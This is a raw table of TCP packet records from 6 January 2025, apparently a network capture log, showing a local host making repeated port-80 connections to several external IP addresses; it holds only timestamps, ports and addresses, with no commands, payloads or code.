Jan 6, 2025 16:02:59.576702118 CET	80	60144	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:59.576752901 CET	60144	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:59.576791048 CET	60144	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:03:00.607266903 CET	60144	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:03:01.626019001 CET	60145	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:03:01.630897999 CET	80	60145	199.59.243.228	192.168.2.8
Jan 6, 2025 16:03:01.631001949 CET	60145	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:03:01.640290022 CET	60145	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:03:01.645119905 CET	80	60145	199.59.243.228	192.168.2.8
Jan 6, 2025 16:03:02.082026958 CET	80	60145	199.59.243.228	192.168.2.8
Jan 6, 2025 16:03:02.082050085 CET	80	60145	199.59.243.228	192.168.2.8
Jan 6, 2025 16:03:02.082072973 CET	80	60145	199.59.243.228	192.168.2.8
Jan 6, 2025 16:03:02.082259893 CET	60145	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:03:02.082318068 CET	60145	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:03:02.085408926 CET	60145	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:03:02.090157032 CET	80	60145	199.59.243.228	192.168.2.8
Jan 6, 2025 16:03:15.291860104 CET	60147	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:15.296751022 CET	80	60147	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:15.296859980 CET	60147	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:15.311470985 CET	60147	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:15.316323996 CET	80	60147	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:15.780582905 CET	80	60147	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:15.780596018 CET	80	60147	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:15.780693054 CET	60147	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:16.826141119 CET	60147	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:17.844876051 CET	60148	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:17.849756956 CET	80	60148	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:17.849869967 CET	60148	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:17.865447044 CET	60148	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:17.870212078 CET	80	60148	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:18.384545088 CET	80	60148	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:18.384949923 CET	80	60148	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:18.384999037 CET	60148	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:19.373096943 CET	60148	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:20.391796112 CET	60149	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:20.396718025 CET	80	60149	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:20.396836042 CET	60149	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:20.411663055 CET	60149	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:20.416528940 CET	80	60149	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:20.416673899 CET	80	60149	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:20.887408972 CET	80	60149	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:20.888984919 CET	80	60149	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:20.889055967 CET	60149	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:21.919945955 CET	60149	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:22.938595057 CET	60156	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:22.943402052 CET	80	60156	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:22.947175026 CET	60156	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:22.956294060 CET	60156	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:22.961131096 CET	80	60156	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:23.479895115 CET	80	60156	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:23.480978012 CET	80	60156	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:23.481055975 CET	60156	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:23.482914925 CET	60156	80	192.168.2.8	104.21.13.141
Jan 6, 2025 16:03:23.487649918 CET	80	60156	104.21.13.141	192.168.2.8
Jan 6, 2025 16:03:28.792362928 CET	60199	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:28.797175884 CET	80	60199	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:28.797271967 CET	60199	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:28.811827898 CET	60199	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:28.816596031 CET	80	60199	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:29.254667997 CET	80	60199	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:29.254841089 CET	80	60199	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:29.254981041 CET	60199	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:30.326169014 CET	60199	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:31.345088959 CET	60215	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:31.349853039 CET	80	60215	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:31.349948883 CET	60215	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:31.365015984 CET	60215	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:31.369823933 CET	80	60215	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:31.804306030 CET	80	60215	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:31.804408073 CET	80	60215	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:31.804483891 CET	60215	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:32.901001930 CET	60215	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:33.918183088 CET	60231	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:33.923078060 CET	80	60231	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:33.923175097 CET	60231	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:33.945579052 CET	60231	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:33.950417042 CET	80	60231	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:33.950485945 CET	80	60231	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:34.383085966 CET	80	60231	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:34.383186102 CET	80	60231	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:34.387316942 CET	60231	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:35.451231003 CET	60231	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:36.470839024 CET	60248	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:36.475616932 CET	80	60248	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:36.475761890 CET	60248	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:36.485178947 CET	60248	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:36.489923000 CET	80	60248	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:37.959880114 CET	80	60248	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:37.960055113 CET	80	60248	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:37.960108995 CET	60248	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:37.963417053 CET	60248	80	192.168.2.8	15.197.240.20
Jan 6, 2025 16:03:37.968220949 CET	80	60248	15.197.240.20	192.168.2.8
Jan 6, 2025 16:03:43.048490047 CET	60293	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:43.053407907 CET	80	60293	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:43.053476095 CET	60293	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:43.072010040 CET	60293	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:43.076874018 CET	80	60293	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:43.690332890 CET	80	60293	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:43.690540075 CET	80	60293	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:43.690598011 CET	60293	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:44.576260090 CET	60293	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:45.595501900 CET	60310	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:45.600311041 CET	80	60310	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:45.600402117 CET	60310	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:45.615884066 CET	60310	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:45.620623112 CET	80	60310	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:46.238909960 CET	80	60310	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:46.238946915 CET	80	60310	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:46.239028931 CET	60310	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:47.123130083 CET	60310	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:48.143197060 CET	60330	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:48.148072004 CET	80	60330	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:48.148197889 CET	60330	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:48.164146900 CET	60330	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:48.169012070 CET	80	60330	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:48.169092894 CET	80	60330	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:48.789870024 CET	80	60330	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:48.789997101 CET	80	60330	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:48.790208101 CET	60330	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:49.670609951 CET	60330	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:50.691361904 CET	60346	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:50.696141005 CET	80	60346	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:50.696572065 CET	60346	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:50.705981016 CET	60346	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:50.710777998 CET	80	60346	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:51.335700989 CET	80	60346	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:51.335774899 CET	80	60346	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:51.335932970 CET	60346	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:51.381277084 CET	60346	80	192.168.2.8	136.243.225.5
Jan 6, 2025 16:03:51.386121988 CET	80	60346	136.243.225.5	192.168.2.8
Jan 6, 2025 16:03:56.410748959 CET	60379	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:03:56.415608883 CET	80	60379	172.67.182.198	192.168.2.8
Jan 6, 2025 16:03:56.415743113 CET	60379	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:03:56.431530952 CET	60379	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:03:56.436394930 CET	80	60379	172.67.182.198	192.168.2.8
Jan 6, 2025 16:03:57.099710941 CET	80	60379	172.67.182.198	192.168.2.8
Jan 6, 2025 16:03:57.100944042 CET	80	60379	172.67.182.198	192.168.2.8
Jan 6, 2025 16:03:57.100995064 CET	60379	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:03:57.935697079 CET	60379	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:03:58.954741001 CET	60394	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:03:58.959598064 CET	80	60394	172.67.182.198	192.168.2.8
Jan 6, 2025 16:03:58.959705114 CET	60394	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:03:58.975280046 CET	60394	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:03:58.980113983 CET	80	60394	172.67.182.198	192.168.2.8
Jan 6, 2025 16:03:59.670411110 CET	80	60394	172.67.182.198	192.168.2.8
Jan 6, 2025 16:03:59.671036959 CET	80	60394	172.67.182.198	192.168.2.8
Jan 6, 2025 16:03:59.671099901 CET	60394	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:00.483148098 CET	60394	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:01.535825968 CET	60413	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:01.542639971 CET	80	60413	172.67.182.198	192.168.2.8
Jan 6, 2025 16:04:01.542738914 CET	60413	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:01.558432102 CET	60413	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:01.563364029 CET	80	60413	172.67.182.198	192.168.2.8
Jan 6, 2025 16:04:01.563405991 CET	80	60413	172.67.182.198	192.168.2.8
Jan 6, 2025 16:04:02.224670887 CET	80	60413	172.67.182.198	192.168.2.8
Jan 6, 2025 16:04:02.225421906 CET	80	60413	172.67.182.198	192.168.2.8
Jan 6, 2025 16:04:02.225544930 CET	60413	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:03.060705900 CET	60413	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:04.079452991 CET	60430	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:04.084347963 CET	80	60430	172.67.182.198	192.168.2.8
Jan 6, 2025 16:04:04.084443092 CET	60430	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:04.093679905 CET	60430	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:04.098483086 CET	80	60430	172.67.182.198	192.168.2.8
Jan 6, 2025 16:04:04.751343966 CET	80	60430	172.67.182.198	192.168.2.8
Jan 6, 2025 16:04:04.751920938 CET	80	60430	172.67.182.198	192.168.2.8
Jan 6, 2025 16:04:04.751975060 CET	60430	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:04.755227089 CET	60430	80	192.168.2.8	172.67.182.198
Jan 6, 2025 16:04:04.759980917 CET	80	60430	172.67.182.198	192.168.2.8
Jan 6, 2025 16:04:09.794472933 CET	60431	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:09.799324989 CET	80	60431	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:09.799397945 CET	60431	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:09.818447113 CET	60431	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:09.823385954 CET	80	60431	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:10.405318975 CET	80	60431	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:10.405441046 CET	80	60431	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:10.405844927 CET	60431	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:11.327050924 CET	60431	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:12.345252991 CET	60432	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:12.350193977 CET	80	60432	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:12.350295067 CET	60432	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:12.367327929 CET	60432	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:12.372196913 CET	80	60432	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:13.021442890 CET	80	60432	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:13.021461010 CET	80	60432	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:13.021601915 CET	60432	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:13.873363018 CET	60432	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:14.891942978 CET	60433	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:14.896845102 CET	80	60433	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:14.898056030 CET	60433	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:14.911828041 CET	60433	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:14.916709900 CET	80	60433	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:14.916795969 CET	80	60433	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:15.500843048 CET	80	60433	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:15.500962019 CET	80	60433	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:15.501009941 CET	60433	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:16.423341990 CET	60433	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:17.450316906 CET	60434	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:17.455141068 CET	80	60434	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:17.455216885 CET	60434	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:17.466837883 CET	60434	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:17.471714020 CET	80	60434	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:18.080249071 CET	80	60434	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:18.080394983 CET	80	60434	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:18.080446959 CET	60434	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:18.085480928 CET	60434	80	192.168.2.8	199.192.21.169
Jan 6, 2025 16:04:18.090255976 CET	80	60434	199.192.21.169	192.168.2.8
Jan 6, 2025 16:04:23.323852062 CET	60435	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:23.328717947 CET	80	60435	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:23.328788996 CET	60435	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:23.344985008 CET	60435	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:23.349792004 CET	80	60435	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:24.857851028 CET	60435	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:24.862807989 CET	80	60435	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:24.863061905 CET	60435	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:25.876508951 CET	60436	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:26.057615995 CET	80	60436	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:26.057687998 CET	60436	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:26.074938059 CET	60436	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:26.079804897 CET	80	60436	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:27.227297068 CET	80	60436	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:27.227334023 CET	80	60436	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:27.227417946 CET	60436	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:27.576467991 CET	60436	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:28.595154047 CET	60437	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:28.600090981 CET	80	60437	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:28.603476048 CET	60437	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:28.615400076 CET	60437	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:28.620296001 CET	80	60437	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:28.620439053 CET	80	60437	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:29.934453964 CET	80	60437	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:29.934900999 CET	80	60437	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:29.934947014 CET	60437	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:30.123403072 CET	60437	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:31.142292023 CET	60438	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:31.147161961 CET	80	60438	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:31.147242069 CET	60438	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:31.159706116 CET	60438	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:31.164513111 CET	80	60438	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:32.004625082 CET	80	60438	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:32.005026102 CET	80	60438	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:32.005070925 CET	60438	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:32.007827044 CET	60438	80	192.168.2.8	45.130.41.107
Jan 6, 2025 16:04:32.012584925 CET	80	60438	45.130.41.107	192.168.2.8
Jan 6, 2025 16:04:37.280165911 CET	60439	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:37.285051107 CET	80	60439	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:37.285120964 CET	60439	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:37.301548004 CET	60439	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:37.306361914 CET	80	60439	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:38.813868046 CET	60439	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:38.818989038 CET	80	60439	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:38.821608067 CET	60439	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:39.831696033 CET	60440	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:39.836600065 CET	80	60440	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:39.836674929 CET	60440	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:39.854856968 CET	60440	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:39.859644890 CET	80	60440	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:41.357721090 CET	60440	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:41.362993956 CET	80	60440	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:41.363044024 CET	60440	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:42.378451109 CET	60441	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:42.383548975 CET	80	60441	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:42.387288094 CET	60441	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:42.400264978 CET	60441	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:42.405061960 CET	80	60441	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:42.405173063 CET	80	60441	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:43.904588938 CET	60441	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:43.911257029 CET	80	60441	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:43.911307096 CET	60441	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:44.923114061 CET	60442	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:44.927995920 CET	80	60442	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:44.929677010 CET	60442	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:44.941634893 CET	60442	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:44.946501017 CET	80	60442	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:45.649457932 CET	80	60442	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:45.649477959 CET	80	60442	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:45.649622917 CET	60442	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:45.652653933 CET	60442	80	192.168.2.8	85.159.66.93
Jan 6, 2025 16:04:45.657392025 CET	80	60442	85.159.66.93	192.168.2.8
Jan 6, 2025 16:04:50.741763115 CET	60443	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:50.746748924 CET	80	60443	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:50.747551918 CET	60443	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:50.761817932 CET	60443	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:50.767354965 CET	80	60443	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:51.212167025 CET	80	60443	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:51.212187052 CET	80	60443	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:51.212236881 CET	60443	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:51.212249994 CET	80	60443	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:51.212295055 CET	60443	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:52.264066935 CET	60443	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:53.283855915 CET	60444	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:53.290347099 CET	80	60444	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:53.290491104 CET	60444	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:53.309426069 CET	60444	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:53.319868088 CET	80	60444	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:53.765609026 CET	80	60444	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:53.765634060 CET	80	60444	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:53.765681028 CET	60444	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:53.766813993 CET	80	60444	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:53.766884089 CET	60444	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:54.810961962 CET	60444	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:55.830189943 CET	60445	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:55.835170031 CET	80	60445	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:55.835249901 CET	60445	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:55.850783110 CET	60445	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:55.855612993 CET	80	60445	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:55.855720043 CET	80	60445	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:56.318329096 CET	80	60445	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:56.318353891 CET	80	60445	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:56.318367958 CET	80	60445	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:56.318439007 CET	60445	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:57.357969046 CET	60445	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:58.379523993 CET	60446	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:58.384494066 CET	80	60446	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:58.384658098 CET	60446	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:58.395519018 CET	60446	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:58.400347948 CET	80	60446	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:58.887651920 CET	80	60446	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:58.887734890 CET	80	60446	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:58.887748957 CET	80	60446	199.59.243.228	192.168.2.8
Jan 6, 2025 16:04:58.888041019 CET	60446	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:58.891585112 CET	60446	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:04:58.897217035 CET	80	60446	199.59.243.228	192.168.2.8
Jan 6, 2025 16:05:04.331557035 CET	60447	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:04.336458921 CET	80	60447	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:04.336558104 CET	60447	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:04.357958078 CET	60447	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:04.364700079 CET	80	60447	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:05.873480082 CET	60447	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:05.922269106 CET	80	60447	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:06.892963886 CET	60448	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:06.898503065 CET	80	60448	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:06.898610115 CET	60448	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:06.914915085 CET	60448	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:06.920888901 CET	80	60448	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:08.423621893 CET	60448	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:08.470344067 CET	80	60448	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:09.439996958 CET	60449	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:09.444960117 CET	80	60449	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:09.445064068 CET	60449	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:09.463754892 CET	60449	80	192.168.2.8	38.22.89.164
